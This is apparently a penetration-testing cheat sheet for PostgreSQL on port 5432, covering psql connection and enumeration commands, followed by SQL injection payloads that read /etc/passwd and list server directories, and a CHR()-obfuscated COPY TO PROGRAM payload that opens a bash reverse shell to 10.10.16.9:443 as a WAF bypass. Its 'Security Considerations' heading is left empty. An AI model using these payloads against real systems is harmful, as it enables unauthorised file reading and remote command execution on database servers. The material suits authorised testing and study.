# PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on standard ports 5432 or alternative ports like 5433.

## How to Connect

### Basic Local Connection

```bash
psql -U <myuser>
```

Opens the psql console with the specified user.

### Remote Connection (Basic)

```bash
psql -h <host> -U <username> -d <database>
```

Connect to a remote PostgreSQL server specifying host, username, and database.

### Remote Connection (Full Parameters)

```bash
psql -h <host> -p <port> -U <username> -W <password> <database>
```

Complete remote connection with all parameters including custom port and password prompt.

## Enumeration

### List All Databases

```sql
\l
```

This command displays all available databases on the PostgreSQL server.

### Switch to a Database

```sql
\c <database_name>
```

Change the current working database context.

### List Tables in Current Database

```sql
\dt
```

Shows all tables within the currently selected database.

### Extract Data from Specific Table

```sql
SELECT * FROM <table_name>;
```

Retrieve all records from a specified table.

## File System Operations

### Read File

```sql
''; SELECT pg_read_file('/etc/passwd',0,1000);
```

Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of `/etc/passwd`.

### List Directory

```sql
''; SELECT pg_ls_dir('/var/www/');
```

Lists the contents of a directory on the server's filesystem.

## Advanced Exploitation

### Reverse Shell WAF Bypass through SQL Injection

```sql
'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;
```

This technique uses PostgreSQL's `COPY` command with a program execution to establish a reverse shell connection. The payload:

* Uses `CHR()` functions to obfuscate the "COPY" command
* Executes a bash reverse shell connecting to IP `10.10.16.9` on port `443`
* Bypasses basic WAF filters through string concatenation

**Note:** Remember to replace the IP address and port with your actual listener configuration.

## Security Considerations